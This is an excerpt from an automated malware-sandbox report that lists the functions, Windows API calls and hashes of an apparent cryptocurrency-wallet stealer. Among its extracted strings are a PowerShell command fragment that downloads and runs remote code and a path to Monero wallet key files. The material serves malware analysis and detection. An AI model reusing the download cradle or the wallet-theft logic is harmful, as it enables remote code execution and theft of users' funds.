                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: >=$>=
                                • API String ID: 1378416451-3543398223
                                • Opcode ID: 71a5d7e43b508f6c52890958a6b1929ddb6382b50cef5aa4f4a3eebe5962695f
                                • Instruction ID: de4444a034c0883e74c6fcafbdf8f679e87e7dc8433da0401197ca20216890a1
                                • Opcode Fuzzy Hash: 71a5d7e43b508f6c52890958a6b1929ddb6382b50cef5aa4f4a3eebe5962695f
                                • Instruction Fuzzy Hash: C0F04935E04208BBD714DFB0EC49F9F77B5AB48714F10C554F621B72C4D67096418B40
                                Function 00EB4300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00EB4325
                                • RegOpenKeyExA.ADVAPI32(80000001,01BFE720,00000000,00020119,?), ref: 00EB4344
                                • RegQueryValueExA.ADVAPI32(?,01BFF1A8,00000000,00000000,00000000,000000FF), ref: 00EB4368
                                • RegCloseKey.ADVAPI32(?), ref: 00EB4372
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB4397
                                • lstrcat.KERNEL32(?,01BFF1C0), ref: 00EB43AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValuememset
                                • String ID:
                                • API String ID: 2623679115-0
                                • Opcode ID: a2e60e07681e9d01358ff4908d09b5f573ffb4b447c1f56bb7fd5d6496c4bdf6
                                • Instruction ID: b1098094b0e7fecc8ffb3dfe7ee34500d799330c56466c0b1bb6f2994f1801fe
                                • Opcode Fuzzy Hash: a2e60e07681e9d01358ff4908d09b5f573ffb4b447c1f56bb7fd5d6496c4bdf6
                                • Instruction Fuzzy Hash: 654178B6D001086BDB28FBA0EC46FEE737DAB48700F004968B72556185EE7556C8CBE1
                                Function 00EAA110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EAA13C
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EAA161
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EAA181
                                • ReadFile.KERNEL32(000000FF,?,00000000,00EA148F,00000000), ref: 00EAA1AA
                                • LocalFree.KERNEL32(00EA148F), ref: 00EAA1E0
                                • CloseHandle.KERNEL32(000000FF), ref: 00EAA1EA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: c54c9f2d39ab4868074742c3a8dbead0f6d57a03784bd30f9e8567ca7734ef05
                                • Instruction ID: 8d0e775d9e27371fa1d741a1cdc24adf94f06558656d045aa3c13d33733f512c
                                • Opcode Fuzzy Hash: c54c9f2d39ab4868074742c3a8dbead0f6d57a03784bd30f9e8567ca7734ef05
                                • Instruction Fuzzy Hash: 4331F0B4A01309EFDB24CF94D845BEE77B5AB59304F149168E911AB380D774A981CFA1
                                Function 00EBCB7E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Typememset
                                • String ID:
                                • API String ID: 3530896902-3916222277
                                • Opcode ID: 9a13bb434d8c54ab884863d39cce0e7ee495d673146d6d6f4f9fcbed5a6ce24e
                                • Instruction ID: a3a5062a2cb7ef457c14f3f5a1c112a9f5a5663af30709f95119e843d9fa2512
                                • Opcode Fuzzy Hash: 9a13bb434d8c54ab884863d39cce0e7ee495d673146d6d6f4f9fcbed5a6ce24e
                                • Instruction Fuzzy Hash: F141197010875C5EDB318B248C85FFBBFF89B55308F2454E8E9CAA7142E2719A44CF60
                                Function 00EB49D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,01BFF130), ref: 00EB4A2B
                                  • Part of subcall function 00EB8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EB8F9B
                                • lstrcat.KERNEL32(?,00000000), ref: 00EB4A51
                                • lstrcat.KERNEL32(?,?), ref: 00EB4A70
                                • lstrcat.KERNEL32(?,?), ref: 00EB4A84
                                • lstrcat.KERNEL32(?,01BEC6F8), ref: 00EB4A97
                                • lstrcat.KERNEL32(?,?), ref: 00EB4AAB
                                • lstrcat.KERNEL32(?,01BFE660), ref: 00EB4ABF
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EB8F20: GetFileAttributesA.KERNEL32(00000000,?,00EA1B94,?,?,00EC577C,?,?,00EC0E22), ref: 00EB8F2F
                                  • Part of subcall function 00EB47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EB47D0
                                  • Part of subcall function 00EB47C0: RtlAllocateHeap.NTDLL(00000000), ref: 00EB47D7
                                  • Part of subcall function 00EB47C0: wsprintfA.USER32 ref: 00EB47F6
                                  • Part of subcall function 00EB47C0: FindFirstFileA.KERNEL32(?,?), ref: 00EB480D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: cbe881174995f1039e2c991606796bd7bfe3c2921cbba903fa83deeb92a57f05
                                • Instruction ID: 5729dd0571a5c6d44d694bf714ccdc36c80c187c6a8c367a2a32e5266d4768bb
                                • Opcode Fuzzy Hash: cbe881174995f1039e2c991606796bd7bfe3c2921cbba903fa83deeb92a57f05
                                • Instruction Fuzzy Hash: 343153B690021867DF28EBB0DD85EDE777CAB48700F4045A9B325A6185DE70A7C8CB94
                                Function 00EB2EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00EB2FD5
                                Strings
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00EB2F14
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00EB2F54
                                • <, xrefs: 00EB2F89
                                • ')", xrefs: 00EB2F03
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: d8d61f3987a5b4b4539f1c83d7157939771dc35464c74b64ce33063191ad913e
                                • Instruction ID: 0048ce51952538dc867a9c96b3f07c9d0cdf8c268c239072cb8fe53fe3a2fc32
                                • Opcode Fuzzy Hash: d8d61f3987a5b4b4539f1c83d7157939771dc35464c74b64ce33063191ad913e
                                • Instruction Fuzzy Hash: 0A41D071910208AADF14FFA0C9A2FDEBBB9AF14300F445579E01576192EF712A49CF91
                                Function 00F1CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                • String ID:
                                • API String ID: 3136044242-0
                                • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                • Instruction ID: bfbd337527b39469cd0c04f7aa2b50b36fcdd161af3ac496b5ea5a924cdc6209
                                • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                • Instruction Fuzzy Hash: F9218172E80698ABDB219E59CC41AFF7A79EB81BA4F054115F819A7211C3348DC1BBE0
                                Function 00EB7F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB7FC7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB7FCE
                                • RegOpenKeyExA.ADVAPI32(80000002,01BED430,00000000,00020119,?), ref: 00EB7FEE
                                • RegQueryValueExA.ADVAPI32(?,01BFE6C0,00000000,00000000,000000FF,000000FF), ref: 00EB800F
                                • RegCloseKey.ADVAPI32(?), ref: 00EB8022
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 0234edd4127dd111a7049e267c1b049b4b80c327eaed937f27af0300d6919dad
                                • Instruction ID: 22e90c15507e4e52ed24616e4b1de5752dafa51883f6a3b9c1bcc93f3bfef527
                                • Opcode Fuzzy Hash: 0234edd4127dd111a7049e267c1b049b4b80c327eaed937f27af0300d6919dad
                                • Instruction Fuzzy Hash: CE118CB1A44205EBE718DB94DD4AFBBBBBCEB04B10F104229F621A7384DB755940CBA1
                                Function 00EB93F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                Download Yara Rule
                                APIs
                                • StrStrA.SHLWAPI(01BFEE60,00000000,00000000,?,00EA9F71,00000000,01BFEE60,00000000), ref: 00EB93FC
                                • lstrcpyn.KERNEL32(01177580,01BFEE60,01BFEE60,?,00EA9F71,00000000,01BFEE60), ref: 00EB9420
                                • lstrlen.KERNEL32(00000000,?,00EA9F71,00000000,01BFEE60), ref: 00EB9437
                                • wsprintfA.USER32 ref: 00EB9457
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 30d206617cedc9137b45e3c1fa060e742be273c8449e3eaae8898471d46ca723
                                • Instruction ID: 69050584efff0d27a887a1f5cc9b34b79ce83b06eb761412feccbb459e2fee19
                                • Opcode Fuzzy Hash: 30d206617cedc9137b45e3c1fa060e742be273c8449e3eaae8898471d46ca723
                                • Instruction Fuzzy Hash: E701DE75540248FFCB18DFA8D988EAE7BB9EB48314F108258F9199B345D731AA40DB90
                                Function 00EA12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA12B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EA12BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EA12D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EA12F5
                                • RegCloseKey.ADVAPI32(?), ref: 00EA12FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 4812ff87b66fa92e11a57b858fbfcbff065efc4626799c2d9f59ad5fe406a751
                                • Instruction ID: f7dbf1a948de54d122ee1a5c5d21fa9893ae7053781d0d253ded1e0260ccd232
                                • Opcode Fuzzy Hash: 4812ff87b66fa92e11a57b858fbfcbff065efc4626799c2d9f59ad5fe406a751
                                • Instruction Fuzzy Hash: 4A011D79A40209BBDB14DFE0DC49FAE77B8AB48700F0041A8FA25972C4D670AA408B90
                                Function 00EB68D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00EB6903
